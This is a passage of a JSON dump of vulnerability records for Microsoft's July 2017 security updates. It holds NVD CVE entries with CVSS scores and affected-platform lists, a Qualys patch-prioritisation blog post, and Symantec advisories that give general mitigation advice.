"cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*"], "id": "CVE-2017-8581", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8581", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:50", "description": "Graphics in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation of privilege vulnerability when it fails to properly handle objects in memory, aka \"Microsoft Graphics Component Elevation of Privilege Vulnerability\". This CVE ID is unique from CVE-2017-8574 and CVE-2017-8556.", "edition": 4, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-11T21:29:00", "title": "CVE-2017-8573", "type": "cve", "cwe": ["CWE-281"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8573"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*"], "id": "CVE-2017-8573", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8573", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:50", "description": "Microsoft WordPad in Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows a remote code execution vulnerability due to the way it parses specially crafted files, aka \"WordPad Remote Code Execution Vulnerability\".", "edition": 4, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-11T21:29:00", "title": "CVE-2017-8588", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8588"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*"], "id": "CVE-2017-8588", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8588", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:50", "description": "Microsoft Windows 1607, 1703, and Windows Server 2016 allows an elevation of privilege vulnerability due to Windows Input Method Editor (IME) improperly handling parameters in a method of a DCOM class, aka \"Windows IME Elevation of Privilege Vulnerability\".", "edition": 4, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-11T21:29:00", "title": "CVE-2017-8566", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8566"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_10:1607"], "id": "CVE-2017-8566", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8566", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*"]}], "qualysblog": [{"lastseen": "2017-07-15T11:18:35", "bulletinFamily": "blog", "cvelist": ["CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8463"], "description": "Today Microsoft released patches covering 54 vulnerabilities as part of July\u2019s Patch Tuesday update, with 26 of them affecting Windows. Patches covering 19 of these vulnerabilities are labeled as Critical, all of which can result in Remote Code execution. According to Microsoft, none of these vulnerabilities are currently being exploited in the wild.\n\nTop priority for patching should go to [CVE-2017-8589](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8589>), which is a vulnerability in the Windows Search service. This vulnerability can be exploited remotely via SMB to take complete control of a system, and can impact both servers and workstations. The issue affects Windows Server 2016, 2012, 2008 R2, 2008 as well as desktop systems like Windows 10, 7 and 8.1. While this vulnerability can leverage SMB as an attack vector, this is not a vulnerability in SMB itself, and is not related to the recent SMB vulnerabilities leveraged by EternalBlue, WannaCry, and Petya.\n\nFor Windows domain controllers, [CVE-2017-8563](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8563>) should also be considered for prioritization. While Microsoft categorizes the patches for this vulnerability as \"Important,\" it could be [leveraged in targeted attacks](<https://blog.preempt.com/new-ldap-rdp-relay-vulnerabilities-in-ntlm>) to elevate privileges and obtain administrative access to domain controllers. This is similar to other [known vulnerabilities](<http://www.darkreading.com/vulnerabilities---threats/sneaky-windows-folder-poisoning-attack-steals-access-rights/d/d-id/1251025>) in NTLM itself. Please note that this patch does require extra [configuration steps](<https://support.microsoft.com/en-us/help/4034879/how-to-add-the-ldapenforcechannelbinding-registry-entry>) to implement the added security.\n\nAside from [CVE-2017-8589](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8589>), patching for workstations and multi-user systems should focus on [CVE-2017-8463](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8463>), which is a vulnerability in Windows Explorer, as well as multiple browser vulnerabilities in Internet Explorer and Edge. Exploitation of these vulnerabilities require user interaction, but can easily become targets for Exploit Kits.\n\nAdobe has also published security bulletin [APSB17-21](<https://helpx.adobe.com/security/products/flash-player/apsb17-21.html>), which provides patches covering three vulnerabilities and is labeled as critical. In addition to these patches, Microsoft has released an update to Adobe Flash for Windows 8.1, Windows 10, Windows Server 2012 and Windows Server 2016. Patching should focus on workstations and multi-user systems.\n\nToday\u2019s release is normal in size, and covers 54 vulnerabilities in Windows, Internet Explorer, Edge, Office, .net Framework, Adobe Flash, and Exchange. Prioritization is based on current information available, and this blog will be updated if there are any additional changes to the threat landscape.", "modified": "2017-07-11T18:32:52", "published": "2017-07-11T18:32:52", "id": "QUALYSBLOG:1C37EC4D058873085167AA48C6A7233A", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2017/07/11/july-patch-tuesday-19-critical-vulnerabilities-from-microsoft-plus-critical-adobe-patches", "type": "qualysblog", "title": "July Patch Tuesday: 19 Critical Vulnerabilities from Microsoft, plus Critical Adobe Patches", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "symantec": [{"lastseen": "2018-03-13T12:07:45", "bulletinFamily": "software", "cvelist": ["CVE-2017-8599"], "description": "### Description\n\nMicrosoft Edge is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Edge \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-07-11T00:00:00", "published": "2017-07-11T00:00:00", "id": "SMNTC-99393", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/99393", "type": "symantec", "title": "Microsoft Edge CVE-2017-8599 Security Bypass Vulnerability", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-03-14T22:40:39", "bulletinFamily": "software", "cvelist": ["CVE-2017-8590"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to run processes with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-07-11T00:00:00", "published": "2017-07-11T00:00:00", "id": "SMNTC-99427", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/99427", "type": "symantec", "title": "Microsoft Windows CVE-2017-8590 Local Privilege Escalation Vulnerability", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-03-14T22:42:38", "bulletinFamily": "software", "cvelist": ["CVE-2017-8588"], "description": "### Description\n\nMicrosoft Wordpad is prone to a remote code-execution vulnerability. Successfully exploiting this issue may result in the execution of arbitrary code in the context of the affected system. Failed exploit attempts will likely result in denial-of-service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-07-11T00:00:00", "published": "2017-07-11T00:00:00", "id": "SMNTC-99400", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/99400", "type": "symantec", "title": "Microsoft Wordpad CVE-2017-8588 Remote Code Execution Vulnerability", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-11T20:41:36", "bulletinFamily": "software", "cvelist": ["CVE-2017-8603"], "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-07-11T00:00:00", "published": "2017-07-11T00:00:00", "id": "SMNTC-99406", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/99406", "type": "symantec", "title": "Microsoft Edge CVE-2017-8603 Scripting Engine Remote Memory Corruption Vulnerability", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-14T22:40:58", "bulletinFamily": "software", "cvelist": ["CVE-2017-8566"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to gain elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-07-11T00:00:00", "published": "2017-07-11T00:00:00", "id": "SMNTC-99404", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/99404", "type": "symantec", "title": "Microsoft Windows CVE-2017-8566 Local Privilege Escalation Vulnerability", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-03-14T22:41:39", "bulletinFamily": "software", "cvelist": ["CVE-2017-8463"], "description": "### Description\n\nMicrosoft Windows Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems R2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity such as unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-07-11T00:00:00", "published": "2017-07-11T00:00:00", "id": "SMNTC-99389", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/99389", "type": "symantec", "title": "Microsoft Windows Explorer CVE-2017-8463 Remote Code Execution Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-14T22:42:14", "bulletinFamily": "software", "cvelist": ["CVE-2017-8495"], "description": "### Description\n\nMicrosoft Windows is prone to a security-bypass vulnerability. Successfully exploiting this issue may allow attackers to bypass certain security restrictions and perform unauthorized actions by conducting a man-in-the-middle attack. This may lead to other attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of successful exploits. \n\n**Implement multiple redundant layers of security.** \nUse of multiple redundant layers of encryption may reduce exposure to this and other latent vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-07-11T00:00:00", "published": "2017-07-11T00:00:00", "id": "SMNTC-99424", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/99424", "type": "symantec", "title": "Microsoft Windows Kerberos CVE-2017-8495 Security Bypass Vulnerability", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-03-12T14:14:42", "bulletinFamily": "software", "cvelist": ["CVE-2017-8611"], "description": "### Description\n\nMicrosoft Edge is prone to a security vulnerability that may allow attackers to conduct spoofing attacks. An attacker can exploit this issue to conduct spoofing attacks and perform unauthorized actions; other attacks are also possible.\n\n### Technologies Affected\n\n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nNever follow links provided by unknown or untrusted sources.\n\n**Set web browser security to disable the execution of script code or active content.** \nSince a successful exploit of this issue allows malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-07-11T00:00:00", "published": "2017-07-11T00:00:00", "id": "SMNTC-99391", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/99391", "type": "symantec", "title": "Microsoft Edge CVE-2017-8611 Spoofing Vulnerability", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-03-14T22:42:55", "bulletinFamily": "software", "cvelist": ["CVE-2017-8562"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to execute arbitrary code in the context of the affected system.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-07-11T00:00:00", "published": "2017-07-11T00:00:00", "id": "SMNTC-99397", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/99397", "type": 